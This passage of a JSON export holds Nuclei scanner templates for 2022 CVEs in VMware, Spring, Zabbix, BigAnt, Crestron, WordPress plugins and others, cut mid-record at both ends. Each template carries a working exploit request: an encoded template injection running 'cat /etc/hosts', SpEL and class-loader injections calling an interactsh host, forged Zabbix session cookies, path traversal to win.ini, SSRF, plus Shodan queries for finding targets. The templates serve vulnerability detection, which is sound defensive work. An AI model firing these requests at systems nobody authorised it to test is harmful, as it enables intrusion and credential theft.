\"{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Authorization context is not valid\"\n\n - type: status\n status:\n - 400\n# digest: 4a0a00473045022100d526962a39ddb96c782fb1b73127f860969e804b9df4fb0e992d34f58b0f8a970220594f3e21afff5d99b6ea0023e8d7fd5b96f238f8b48d7c5de5b4269733b91906:922c64590222798bb761d5b6d8e72950", "hash": "6189ce67178263e39277dd0afba06465", "level": 6, "time": "2024-05-17 23:39:45" }, { 
"_id": { "$oid": "66477a413521042ccf30849f" }, "name": "CVE-2022-22963.yaml", "content": "id: CVE-2022-22963\n\ninfo:\n name: Spring Cloud - Remote Code Execution\n author: Mr-xn,Adam Crosser\n severity: critical\n description: |\n Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions are susceptible to remote code execution vulnerabilities. When using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches provided by the Spring Cloud project to mitigate this vulnerability.\n reference:\n - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f\n - https://github.com/cckuailong/spring-cloud-function-SpEL-RCE\n - https://tanzu.vmware.com/security/cve-2022-22963\n - https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert/\n - https://github.com/vulhub/vulhub/tree/scf-spel/spring/spring-cloud-function-spel-injection\n - https://nvd.nist.gov/vuln/detail/CVE-2022-22963\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-22963\n cwe-id: CWE-94,CWE-917\n epss-score: 0.97537\n epss-percentile: 0.99993\n cpe: cpe:2.3:a:vmware:spring_cloud_function:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: vmware\n product: spring_cloud_function\n tags: cve,cve2022,vulhub,springcloud,rce,kev,vmware\n\nhttp:\n - raw:\n - |\n POST /functionRouter HTTP/1.1\n Host: {{Hostname}}\n spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName(\"{{interactsh-url}}\")\n Content-Type: application/x-www-form-urlencoded\n\n {{rand_base(8)}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: 
interactsh_protocol\n words:\n - \"http\"\n - \"dns\"\n condition: or\n\n - type: status\n status:\n - 500\n# digest: 490a0046304402205d6843e61f79f6f923c45f295fdbd23eb8553580f133f3595140c997e398c304022032df92fd24048679c909836db50aeef2682dfff4b5c6e8a8e844e32c0a7de57e:922c64590222798bb761d5b6d8e72950", "hash": "3dcd68ffdfdc491aa4b2b353e31d81c3", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084a0" }, "name": "CVE-2022-22965.yaml", "content": "id: CVE-2022-22965\n\ninfo:\n name: Spring - Remote Code Execution\n author: justmumu,arall,dhiyaneshDK,akincibor\n severity: critical\n description: |\n Spring MVC and Spring WebFlux applications running on Java Development Kit 9+ are susceptible to remote code execution via data binding. It requires the application to run on Tomcat as a WAR deployment. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: If the application is deployed as a Spring Boot executable jar, i.e. 
the default, it is not vulnerable to this exploit.\n reference:\n - https://tanzu.vmware.com/security/cve-2022-22965\n - https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/\n - https://twitter.com/RandoriAttack/status/1509298490106593283\n - https://mp.weixin.qq.com/s/kgw-O4Hsd9r2vfme3Y2Ynw\n - https://twitter.com/_0xf4n9x_/status/1509935429365100546\n - https://nvd.nist.gov/vuln/detail/cve-2022-22965\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-22965\n cwe-id: CWE-94\n epss-score: 0.97493\n epss-percentile: 0.99972\n cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*\n metadata:\n max-request: 4\n vendor: vmware\n product: spring_framework\n tags: cve2022,cve,rce,spring,injection,oast,intrusive,kev,vmware\n\nhttp:\n - raw:\n - |\n POST {{BaseURL}} HTTP/1.1\n Content-Type: application/x-www-form-urlencoded\n\n class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx\n - |\n GET /?class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1\n\n payloads:\n interact_protocol:\n - \"http\"\n - https\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: Java\"\n case-insensitive: true\n# digest: 4b0a00483046022100bab8cdd853737b59319b38f4bee9f7caa33da5df53d776fd392da693df12fe4c0221009da74a2a2b55cffc468b0567927c7f7e1beec337f6f1827b8ed42e5ae792ffd1:922c64590222798bb761d5b6d8e72950", "hash": "fbafe34b40b62c7947d29ad1ecf2a6df", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084a1" }, "name": "CVE-2022-22972.yaml", "content": "id: CVE-2022-22972\n\ninfo:\n name: VMware Workspace ONE 
Access/Identity Manager/vRealize Automation - Authentication Bypass\n author: For3stCo1d,princechaddha\n severity: critical\n description: |\n VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the affected system.\n remediation: |\n Apply the latest security patches or updates provided by VMware to fix the authentication bypass vulnerability (CVE-2022-22972).\n reference:\n - https://github.com/horizon3ai/CVE-2022-22972\n - https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive\n - https://www.vmware.com/security/advisories/VMSA-2022-0014.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-22972\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-22972\n cwe-id: CWE-287\n epss-score: 0.7146\n epss-percentile: 0.9778\n cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:*\n metadata:\n max-request: 3\n vendor: vmware\n product: identity_manager\n fofa-query: app=\"vmware-Workspace-ONE-Access\" || app=\"vmware-Identity-Manager\" || app=\"vmware-vRealize\"\n tags: cve2022,cve,vmware,auth-bypass,oast\n\nhttp:\n - raw:\n - |\n GET /vcac/ HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /vcac/?original_uri={{RootURL}}%2Fvcac HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /SAAS/auth/login/embeddedauthbroker/callback HTTP/1.1\n Host: {{interactsh-url}}\n Content-type: application/x-www-form-urlencoded\n\n 
protected_state={{protected_state}}&userstore={{userstore}}&username=administrator&password=horizon&userstoreDisplay={{userstoreDisplay}}&horizonRelayState={{horizonRelayState}}&stickyConnectorId={{stickyConnectorId}}&action=Sign+in\n\n host-redirects: true\n max-redirects: 3\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"HZN=\"\n\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: status\n status:\n - 302\n\n extractors:\n - type: regex\n name: protected_state\n group: 1\n regex:\n - 'id=\"protected_state\" value=\"([a-zA-Z0-9]+)\"\\/>'\n internal: true\n part: body\n\n - type: regex\n name: horizonRelayState\n group: 1\n regex:\n - 'name=\"horizonRelayState\" value=\"([a-z0-9-]+)\"\\/>'\n internal: true\n part: body\n\n - type: regex\n name: userstore\n group: 1\n regex:\n - 'id=\"userstore\" value=\"([a-z.]+)\" \\/>'\n internal: true\n part: body\n\n - type: regex\n name: userstoreDisplay\n group: 1\n regex:\n - 'id=\"userstoreDisplay\" readonly class=\"login-input transparent_class\" value=\"(.*)\"/>'\n internal: true\n part: body\n\n - type: regex\n name: stickyConnectorId\n group: 1\n regex:\n - 'name=\"stickyConnectorId\" value=\"(.*)\"/>'\n internal: true\n part: body\n\n - type: kval\n name: HZN-Cookie\n kval:\n - 'HZN'\n part: header\n# digest: 4a0a0047304502206403cd0d279ad3059877b01e431f357ec5373c9854c2ff5cbe853a8ac65ef39c022100d9069fe039d74cbcad2eb0f8ef4724af0436462068f8baecdb321328ac7a89af:922c64590222798bb761d5b6d8e72950", "hash": "9480c43b6d9ddda21fc9d42850f84f3a", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084a2" }, "name": "CVE-2022-23102.yaml", "content": "id: CVE-2022-23102\n\ninfo:\n name: SINEMA Remote Connect Server < V2.0 - Open Redirect\n author: ctflearner,ritikchaddha\n severity: medium\n description: |\n A vulnerability has been identified in SINEMA Remote Connect Server (All versions < V2.0). 
Affected products contain an open redirect vulnerability. An attacker could trick a valid authenticated user to the device into clicking a malicious link there by leading to phishing attacks.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks.\n remediation: |\n Upgrade to SINEMA Remote Connect Server version 2.0 or later to fix the open redirect vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/cve-2022-23102\n - https://packetstormsecurity.com/files/165966/SIEMENS-SINEMA-Remote-Connect-1.0-SP3-HF1-Open-Redirection.html\n - https://seclists.org/fulldisclosure/2022/Feb/20\n - https://cert-portal.siemens.com/productcert/pdf/ssa-654775.pdf\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-23102\n cwe-id: CWE-601\n epss-score: 0.00366\n epss-percentile: 0.71925\n cpe: cpe:2.3:a:siemens:sinema_remote_connect_server:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: siemens\n product: sinema_remote_connect_server\n shodan-query: title:\"Logon - SINEMA Remote Connect\"\n tags: cve,cve2022,packetstorm,seclists,redirect,sinema,authenticated,siemens\n\nhttp:\n - raw:\n - |\n GET /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: csrftoken={{csrf}};\n Referer: {{RootURL}}/wbm/login/?next=https%3A%2F%2Finteract.sh\n\n csrfmiddlewaretoken={{csrf}}&utcoffset=330&username={{username}}&password={{password}}\n\n matchers:\n - type: regex\n part: header_2\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$'\n\n extractors:\n - type: regex\n name: csrf\n part: body\n group: 1\n regex:\n - \"name='csrfmiddlewaretoken' 
value='(.*)' />\"\n internal: true\n# digest: 490a0046304402203cad78aaff543175f5e30153ca01cb6d6a88448ec822dc9559ed8b13434d6e9c022002833237d916abd0bcc7d2263671711bfe6b01b5fdaf5564e962070a75d71045:922c64590222798bb761d5b6d8e72950", "hash": "4cd9ccf7682c7908a55743656b756a96", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084a3" }, "name": "CVE-2022-23131.yaml", "content": "id: CVE-2022-23131\n\ninfo:\n name: Zabbix - SAML SSO Authentication Bypass\n author: For3stCo1d,spac3wh1te\n severity: critical\n description: When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Zabbix monitoring system.\n remediation: Upgrade to 5.4.9rc2, 6.0.0beta1, 6.0 (plan) or higher.\n reference:\n - https://support.zabbix.com/browse/ZBX-20350\n - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage\n - https://nvd.nist.gov/vuln/detail/CVE-2022-23131\n - https://github.com/1mxml/CVE-2022-23131\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-23131\n cwe-id: CWE-290\n epss-score: 0.96952\n epss-percentile: 0.9967\n cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: zabbix\n product: zabbix\n shodan-query: http.favicon.hash:892542951\n fofa-query: app=\"ZABBIX-监控系统\" && body=\"saml\"\n tags: cve,cve2022,zabbix,auth-bypass,saml,sso,kev\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/zabbix/index_sso.php\"\n - \"{{BaseURL}}/index_sso.php\"\n\n stop-at-first-match: true\n\n headers:\n Cookie: \"zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9\"\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - 
\"contains(tolower(header), 'location: zabbix.php?action=dashboard.view')\"\n\n - type: status\n status:\n - 302\n# digest: 490a0046304402205a1b293df8b7aed723300bcf514a562944a5b7526bc1d6567e5629fb5dcdeb4102201e42210613038aa5ab1f2efe25c521bab18fa8617d682b250c5261c0630a53d5:922c64590222798bb761d5b6d8e72950", "hash": "247054e76e22dbc505a7fd66ffcf8ff5", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084a4" }, "name": "CVE-2022-23134.yaml", "content": "id: CVE-2022-23134\n\ninfo:\n name: Zabbix Setup Configuration Authentication Bypass\n author: bananabr\n severity: medium\n description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Zabbix setup configuration.\n remediation: |\n Apply the latest security patches or updates provided by Zabbix to fix the authentication bypass vulnerability.\n reference:\n - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage\n - https://nvd.nist.gov/vuln/detail/CVE-2022-23134\n - https://support.zabbix.com/browse/ZBX-20384\n - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6SZYHXINBKCY42ITFSNCYE7KCSF33VRA/\n - https://lists.debian.org/debian-lts-announce/2022/02/msg00008.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\n cvss-score: 5.3\n cve-id: CVE-2022-23134\n cwe-id: CWE-287,CWE-284\n epss-score: 0.34559\n epss-percentile: 0.9671\n cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: zabbix\n product: zabbix\n tags: cve,cve2022,zabbix,auth-bypass,kev\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/zabbix/setup.php\"\n - 
\"{{BaseURL}}/setup.php\"\n\n stop-at-first-match: true\n\n headers:\n Cookie: \"zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"Database\"\n - \"host\"\n - \"port\"\n - \"Zabbix\"\n condition: and\n\n - type: word\n words:\n part: header\n - \"youtube_main\"\n - \"support.google.com\"\n condition: and\n negative: true\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220695464715fb5b707e371729bca1f71d84025cef6fd8cc1e7f5928addeafca49b022100800c9be1e34778f85f48887851c69b484d2b920f2b0f4eda74127fb5dbc58394:922c64590222798bb761d5b6d8e72950", "hash": "0fb5761b99d6328f1b4490fd25363787", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084a5" }, "name": "CVE-2022-2314.yaml", "content": "id: CVE-2022-2314\n\ninfo:\n name: WordPress VR Calendar <=2.3.2 - Remote Code Execution\n author: theamanrawat\n severity: critical\n description: |\n WordPress VR Calendar plugin through 2.3.2 is susceptible to remote code execution. The plugin allows any user to execute arbitrary PHP functions on the site. 
An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site.\n remediation: |\n Update the WordPress VR Calendar plugin to version 2.3.3 or later to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/b22fe77c-844e-4c24-8023-014441cc1e82\n - https://wordpress.org/plugins/vr-calendar-sync/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2314\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-2314\n cwe-id: CWE-78,NVD-CWE-noinfo\n epss-score: 0.26874\n epss-percentile: 0.96341\n cpe: cpe:2.3:a:vr_calendar_project:vr_calendar:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: vr_calendar_project\n product: vr_calendar\n framework: wordpress\n tags: cve,cve2022,wordpress,wp,wp-plugin,rce,vr-calendar-sync,unauth,wpscan,vr_calendar_project\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_2\n words:\n - \"phpinfo\"\n - \"PHP Version\"\n condition: and\n\n - type: word\n part: body_1\n words:\n - \"vrc-calendar\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206692348e2633018a23d148415e047563294843e45c7b5ee7d28a232472ccfa8a0220754a5291e01ce0d4ea4c998c533782d53abed0b92402761dd3c6984b8e34ac71:922c64590222798bb761d5b6d8e72950", "hash": "43f77ec809ec94c76321fa79a63ac1a1", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084a6" }, "name": "CVE-2022-23178.yaml", "content": "id: 
CVE-2022-23178\n\ninfo:\n name: Crestron Device - Credentials Disclosure\n author: gy741\n severity: critical\n description: An issue was discovered on Crestron HD-MD4X2-4K-E 1.0.0.2159 devices. When the administrative web interface of the HDMI switcher is accessed unauthenticated, user credentials are disclosed that are valid to authenticate to the web interface. Specifically, aj.html sends a JSON document with uname and upassword fields.\n impact: |\n An attacker can obtain sensitive credentials, leading to unauthorized access and potential compromise of the device.\n remediation: |\n Update the Crestron Device firmware to the latest version to mitigate the vulnerability.\n reference:\n - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-009/-credential-disclosure-in-web-interface-of-crestron-device\n - https://nvd.nist.gov/vuln/detail/CVE-2022-23178\n - https://de.crestron.com/Products/Video/HDMI-Solutions/HDMI-Switchers/HD-MD4X2-4K-E\n - https://www.redteam-pentesting.de/advisories/rt-sa-2021-009\n - https://github.com/Threekiii/Awesome-POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-23178\n cwe-id: CWE-287\n epss-score: 0.03228\n epss-percentile: 0.90998\n cpe: cpe:2.3:o:crestron:hd-md4x2-4k-e_firmware:1.0.0.2159:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: crestron\n product: hd-md4x2-4k-e_firmware\n tags: cve,cve2022,crestron,disclosure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/aj.html?a=devi\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"uname\":'\n - '\"upassword\":'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d1c5b7aab36ebb46a67356cf0a5a48a305da382e9d3a43ac270e79ff9357f562022100cdcbe30a39cf91a64f0a091ef2be9cb9310852f41f338fdd38b35176ed55b2b2:922c64590222798bb761d5b6d8e72950", "hash": "a1fc3487fde59db25ac3c057d2f70f64", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": 
"66477a413521042ccf3084a7" }, "name": "CVE-2022-23347.yaml", "content": "id: CVE-2022-23347\n\ninfo:\n name: BigAnt Server v5.6.06 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: BigAnt Server v5.6.06 is vulnerable to local file inclusion.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the server.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in BigAnt Server v5.6.06.\n reference:\n - https://github.com/bzyo/cve-pocs/tree/master/CVE-2022-23347\n - https://nvd.nist.gov/vuln/detail/CVE-2022-23347\n - http://bigant.com\n - https://www.bigantsoft.com/\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-23347\n cwe-id: CWE-22\n epss-score: 0.1468\n epss-percentile: 0.95635\n cpe: cpe:2.3:a:bigantsoft:bigant_server:5.6.06:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: bigantsoft\n product: bigant_server\n shodan-query: http.html:\"BigAnt\"\n tags: cve,cve2022,bigant,lfi,bigantsoft\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402201d2b033a4d065dc457c2bd88fd09609a69b0f0999e1d44242fc8387d1c118276022052c1fd2978c3590d540c66759ce5c8203011da6e4d81139306e90fc70958a40e:922c64590222798bb761d5b6d8e72950", "hash": "d3f4aebca4690d3850851c073c32d0b9", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084a8" }, "name": "CVE-2022-23348.yaml", "content": "id: CVE-2022-23348\n\ninfo:\n name: BigAnt Server 5.6.06 - 
Improper Access Control\n author: arafatansari\n severity: medium\n description: |\n BigAnt Server 5.6.06 is susceptible to improper access control. The software utililizes weak password hashes. An attacker can craft a password hash and thereby possibly possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the access control issue.\n reference:\n - https://github.com/bzyo/cve-pocs/tree/master/CVE-2022-23348\n - http://bigant.com\n - https://nvd.nist.gov/vuln/detail/CVE-2022-23348\n - https://www.bigantsoft.com/\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2022-23348\n cwe-id: CWE-916\n epss-score: 0.00425\n epss-percentile: 0.71717\n cpe: cpe:2.3:a:bigantsoft:bigant_server:5.6.06:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: bigantsoft\n product: bigant_server\n shodan-query: http.html:\"bigant\"\n tags: cve,cve2022,bigant,unauth,exposure,bigantsoft\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/Runtime/Data/ms_admin.php\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"user_name\";'\n - '\"user_pwd\";'\n - '\"user_id\";'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100cc5a1e9ab10a42df26c83f3bba3e5577c2c8cfe4b97d834eba3461a9745d8f2d022100c9eba2a9ce77b634e7a4f2af4a07997e509bbc86520f70968b5457b7f55aa102:922c64590222798bb761d5b6d8e72950", "hash": "3d47eb8deceac77cce442826631f67a9", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084a9" }, "name": "CVE-2022-23544.yaml", "content": "id: CVE-2022-23544\n\ninfo:\n name: MeterSphere < 2.5.0 SSRF\n author: j4vaovo\n severity: medium\n description: |\n MeterSphere is a one-stop open source continuous 
testing platform, covering test management, interface testing, UI testing and performance testing. Versions prior to 2.5.0 are subject to a Server-Side Request Forgery that leads to Cross-Site Scripting. A Server-Side request forgery in `IssueProxyResourceService::getMdImageByUrl` allows an attacker to access internal resources, as well as executing JavaScript code in the context of Metersphere's origin by a victim of a reflected XSS. This vulnerability has been fixed in v2.5.0. There are no known workarounds.\n impact: |\n An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Upgrade MeterSphere to version 2.5.0 or later to mitigate the SSRF vulnerability.\n reference:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23544\n - https://nvd.nist.gov/vuln/detail/CVE-2022-23544\n - https://github.com/metersphere/metersphere/security/advisories/GHSA-vrv6-cg45-rmjj\n - https://github.com/metersphere/metersphere/commit/d0f95b50737c941b29d507a4cc3545f2dc6ab121\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-23544\n cwe-id: CWE-918,CWE-79\n epss-score: 0.00083\n epss-percentile: 0.34435\n cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: metersphere\n product: metersphere\n shodan-query: html:\"metersphere\"\n fofa-query: title=\"MeterSphere\"\n tags: cve2022,cve,metersphere,ssrf,oast,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/resource/md/get/url?url=http://oast.pro\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Interactsh Server'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 
490a0046304402202c5b2eb5590a975c3168c5bf10ecafe306c4717f4461655b26d62aef269d5f3602207433e872a215f20e193af9adca4050f730dde0a9a36d95ba76a624d43780047a:922c64590222798bb761d5b6d8e72950", "hash": "1ec325044d0de70e7966351c12af0d7c", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084aa" }, "name": "CVE-2022-2373.yaml", "content": "id: CVE-2022-2373\n\ninfo:\n name: WordPress Simply Schedule Appointments <1.5.7.7 - Information Disclosure\n author: theamanrawat,theabhinavgaur\n severity: medium\n description: |\n WordPress Simply Schedule Appointments plugin before 1.5.7.7 is susceptible to information disclosure. The plugin is missing authorization in a REST endpoint, which can allow an attacker to retrieve user details such as name and email address.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information from the target system.\n remediation: |\n Update to the latest version of the Simply Schedule Appointments plugin (1.5.7.7 or higher) to fix the information disclosure vulnerability.\n reference:\n - https://wpscan.com/vulnerability/6aa9aa0d-b447-4584-a07e-b8a0d1b83a31\n - https://wordpress.org/plugins/simply-schedule-appointments/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2373\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2022-2373\n cwe-id: CWE-862\n epss-score: 0.00292\n epss-percentile: 0.68538\n cpe: cpe:2.3:a:nsqua:simply_schedule_appointments:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: nsqua\n product: simply_schedule_appointments\n framework: wordpress\n tags: cve,cve2022,simply-schedule-appointments,unauth,wpscan,wordpress,wp-plugin,wp,nsqua\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-json/ssa/v1/users\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - 
